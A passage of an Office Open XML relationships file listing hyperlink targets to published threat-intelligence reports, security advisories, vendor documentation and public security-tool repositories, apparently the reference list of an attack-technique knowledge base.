Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing" TargetMode="External"/><Relationship Id="rId2494" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html" TargetMode="External"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf" TargetMode="External"/><Relationship Id="rId466" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem" TargetMode="External"/><Relationship Id="rId673" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/" TargetMode="External"/><Relationship Id="rId880" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html" TargetMode="External"/><Relationship Id="rId1096" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf" TargetMode="External"/><Relationship Id="rId2147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rewterz.com/threats/sidewinder-apt-group-campaign-analysis" TargetMode="External"/><Relationship Id="rId2354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://rkhunter.sourceforge.net/" TargetMode="External"/><Relationship Id="rId2561" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.techrepublic.com/blog/data-center/configuring-wireless-settings-via-group-policy/" TargetMode="External"/><Relationship Id="rId2799" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104" TargetMode="External"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/" TargetMode="External"/><Relationship Id="rId533" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cylance.com/content/dam/cylance/pdfs/white_papers/RedirectToSMB.pdf" TargetMode="External"/><Relationship Id="rId978" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant" TargetMode="External"/><Relationship Id="rId1163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intezer.com/blog/research/acbackdoor-analysis-of-a-new-multiplatform-backdoor/" TargetMode="External"/><Relationship Id="rId1370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/ff919712.aspx" TargetMode="External"/><Relationship Id="rId2007" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/" TargetMode="External"/><Relationship Id="rId2214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/threat-profiles/bronze-mohawk" TargetMode="External"/><Relationship Id="rId2659" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sjc1-te-ftp.trendmicro.com/images/tex/pdf/RawPOS%20Technical%20Brief.pdf" TargetMode="External"/><Relationship Id="rId2866" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Duqu" TargetMode="External"/><Relationship Id="rId740" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1" TargetMode="External"/><Relationship Id="rId838" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html" TargetMode="External"/><Relationship Id="rId1023" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielbohannon/Revoke-Obfuscation" TargetMode="External"/><Relationship Id="rId1468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf" TargetMode="External"/><Relationship Id="rId1675" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya" TargetMode="External"/><Relationship Id="rId1882" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm" TargetMode="External"/><Relationship Id="rId2421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/security_response/writeup.jsp?docid=2012-051605-2535-99" TargetMode="External"/><Relationship Id="rId2519" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/library/cc732443.aspx" TargetMode="External"/><Relationship Id="rId2726" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/ncas/alerts/TA16-091A" TargetMode="External"/><Relationship Id="rId600" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gentilkiwi/mimikatz" TargetMode="External"/><Relationship Id="rId1230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/" TargetMode="External"/><Relationship Id="rId1328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/1/ftp" TargetMode="External"/><Relationship Id="rId1535" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction" TargetMode="External"/><Relationship Id="rId2933" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zscaler.com/blogs/security-research/return-higaisa-apt" TargetMode="External"/><Relationship Id="rId905" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html" TargetMode="External"/><Relationship Id="rId1742" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/kb/310105" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/" TargetMode="External"/><Relationship Id="rId1602" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack" TargetMode="External"/><Relationship Id="rId3055" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cynet.com/attack-techniques-hands-on/defense-evasion-techniques/" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operations-overview" TargetMode="External"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf" TargetMode="External"/><Relationship Id="rId1907" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5" TargetMode="External"/><Relationship Id="rId2071" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1" TargetMode="External"/><Relationship Id="rId488" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/" TargetMode="External"/><Relationship Id="rId695" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/" TargetMode="External"/><Relationship Id="rId2169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securityartwork.es/wp-content/uploads/2017/07/Trickbot-report-S2-Grupo.pdf" TargetMode="External"/><Relationship Id="rId2376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.stealthbits.com/detect-pass-the-ticket-attacks" TargetMode="External"/><Relationship Id="rId2583" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/" TargetMode="External"/><Relationship Id="rId2790" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/valak-evolution/" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amnesty.org/en/latest/research/2019/08/evolving-phishing-attacks-targeting-journalists-and-human-rights-defenders-from-the-middle-east-and-north-africa/" TargetMode="External"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.circl.lu/services/passive-dns/" TargetMode="External"/><Relationship Id="rId555" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thedfirreport.com/2020/10/08/ryuks-return/" TargetMode="External"/><Relationship Id="rId762" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain" TargetMode="External"/><Relationship Id="rId1185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jamf.com/jamf-nation/discussions/18574/user-password-policies-on-non-ad-machines" TargetMode="External"/><Relationship Id="rId1392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac" TargetMode="External"/><Relationship Id="rId2029" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://phrack.org/issues/51/8.html" TargetMode="External"/><Relationship Id="rId2236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/my-name-is-dtrack/93338/" TargetMode="External"/><Relationship Id="rId2443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates" TargetMode="External"/><Relationship Id="rId2650" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/" TargetMode="External"/><Relationship Id="rId2888" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rarlab.com/" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf" TargetMode="External"/><Relationship Id="rId415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.cobaltstrike.com/2017/05/23/cobalt-strike-3-8-whos-your-daddy/" TargetMode="External"/><Relationship Id="rId622" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/engine/api/v1.41/" TargetMode="External"/><Relationship Id="rId1045" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py" TargetMode="External"/><Relationship Id="rId1252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/the-great-bank-robbery-the-carbanak-apt/68732/" TargetMode="External"/><Relationship Id="rId1697" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/jj852185(v=ws.11)?redirectedfrom=MSDN" TargetMode="External"/><Relationship Id="rId2303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/" TargetMode="External"/><Relationship Id="rId2510" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/" TargetMode="External"/><Relationship Id="rId2748" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2017/10/unit42-badpatch/" TargetMode="External"/><Relationship Id="rId2955" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/" TargetMode="External"/><Relationship Id="rId927" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html" TargetMode="External"/><Relationship Id="rId1112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/" TargetMode="External"/><Relationship Id="rId1557" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview" TargetMode="External"/><Relationship Id="rId1764" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps" TargetMode="External"/><Relationship Id="rId1971" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf" TargetMode="External"/><Relationship Id="rId2608" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the-heartbeat-apt-campaign.pdf?" TargetMode="External"/><Relationship Id="rId2815" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.xpnsec.com/aws-lambda-redirector/" TargetMode="External"/><Relationship Id="rId1417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.malwarebytes.com/docs/DOC-2295" TargetMode="External"/><Relationship Id="rId1624" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019" TargetMode="External"/><Relationship Id="rId1831" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec" TargetMode="External"/><Relationship Id="rId3077" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html" TargetMode="External"/><Relationship Id="rId1929" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html" TargetMode="External"/><Relationship Id="rId2093" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf" TargetMode="External"/><Relationship Id="rId2398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/security-center/writeup/2018-073014-2512-99?om_rssid=sr-latestthreats30days" TargetMode="External"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/uscert/ncas/alerts/aa22-057a" TargetMode="External"/><Relationship Id="rId577" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/" TargetMode="External"/><Relationship Id="rId2160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.riskiq.com/blog/labs/magecart-newegg/" TargetMode="External"/><Relationship Id="rId2258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" TargetMode="External"/><Relationship Id="rId3004" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://itm4n.github.io/windows-registry-rpceptmapper-eop/" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf" TargetMode="External"/><Relationship Id="rId784" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/" TargetMode="External"/><Relationship Id="rId991" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GhostPack/SharpDPAPI" TargetMode="External"/><Relationship Id="rId1067" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/kms/docs/key-rotation" TargetMode="External"/><Relationship Id="rId2020" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019" TargetMode="External"/><Relationship Id="rId2465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/sysinternals/downloads/sysmon" TargetMode="External"/><Relationship Id="rId2672" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/" TargetMode="External"/><Relationship Id="rId437" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.countercept.com/blog/detecting-parent-pid-spoofing/" TargetMode="External"/><Relationship Id="rId644" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dragos.com/threat/talonite/" TargetMode="External"/><Relationship Id="rId851" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html" TargetMode="External"/><Relationship Id="rId1274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/" TargetMode="External"/><Relationship Id="rId1481" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/blogs/other-blogs/mcafee-labs-detects-zero-day-exploit-targeting-microsoft-office-2" TargetMode="External"/><Relationship Id="rId1579" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows/device-security/security-policy-settings/create-a-token-object" TargetMode="External"/><Relationship Id="rId2118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf" TargetMode="External"/><Relationship Id="rId2325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://shodan.io/" TargetMode="External"/><Relationship Id="rId2532" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/bb490921.aspx" TargetMode="External"/><Relationship Id="rId2977" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/" TargetMode="External"/><Relationship Id="rId504" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware" TargetMode="External"/><Relationship Id="rId711" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://recon.cx/2018/brussels/resources/slides/RECON-BRX-2018-Visiting-The-Snake-Nest.pdf" TargetMode="External"/><Relationship Id="rId949" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freedesktop.org/software/systemd/man/systemd-journald.service.html" TargetMode="External"/><Relationship Id="rId1134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityintelligence.com/posts/ransomware-2020-attack-trends-new-techniques-affecting-organizations-worldwide/" TargetMode="External"/><Relationship Id="rId1341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/" TargetMode="External"/><Relationship Id="rId1786" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Totbrick" TargetMode="External"/><Relationship Id="rId1993" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/" TargetMode="External"/><Relationship Id="rId2837" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/dd183341" TargetMode="External"/><Relationship Id="rId809" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf" TargetMode="External"/><Relationship Id="rId1201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://skanthak.homepage.t-online.de/sentinel.html" TargetMode="External"/><Relationship Id="rId1439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns" TargetMode="External"/><Relationship Id="rId1646" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk" TargetMode="External"/><Relationship Id="rId1853" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/its-a-feature/Mythic" TargetMode="External"/><Relationship Id="rId2904" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/" TargetMode="External"/><Relationship Id="rId1506" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-2/" TargetMode="External"/><Relationship Id="rId1713" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor%3aWin32%2fPoisonivy.E" TargetMode="External"/><Relationship Id="rId1920" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess" TargetMode="External"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/" TargetMode="External"/><Relationship Id="rId2182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/whos-really-spreading-through-the-bright-star/68978/" TargetMode="External"/><Relationship Id="rId3026" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/" TargetMode="External"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.cisco.com/security/center/resources/integrity_assurance.html" TargetMode="External"/><Relationship Id="rId599" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/" TargetMode="External"/><Relationship Id="rId2042" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.prevailion.com/phantom-in-the-command-shell-2/" TargetMode="External"/><Relationship Id="rId2487" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2017/06/palestine-delphi.html" TargetMode="External"/><Relationship Id="rId2694" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/ItsReallyNick/status/1189622925286084609" TargetMode="External"/><Relationship Id="rId459" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adversary.crowdstrike.com/en-US/adversary/silent-chollima/" TargetMode="External"/><Relationship Id="rId666" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.eset.com/fileadmin/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf" TargetMode="External"/><Relationship Id="rId873" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html" TargetMode="External"/><Relationship Id="rId1089" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.group-ib.com/colunmtk_apt41" TargetMode="External"/><Relationship Id="rId1296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lolbas-project.github.io/" TargetMode="External"/><Relationship Id="rId2347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/" TargetMode="External"/><Relationship Id="rId2554" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/library/cc938799.aspx" TargetMode="External"/><Relationship Id="rId2999" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf" TargetMode="External"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)" TargetMode="External"/><Relationship Id="rId526" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cybleinc.com/2020/09/26/sidewinder-apt-targets-with-futuristic-tactics-and-techniques/" TargetMode="External"/><Relationship Id="rId1156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.stealthbits.com/attack-step-3-persistence-ntfs-extended-attributes-file-system-attacks" TargetMode="External"/><Relationship Id="rId1363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20140804175025/http:/blogs.technet.com/b/mmpc/archive/2012/10/03/malware-signed-with-the-adobe-code-signing-certificate.aspx" TargetMode="External"/><Relationship Id="rId2207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 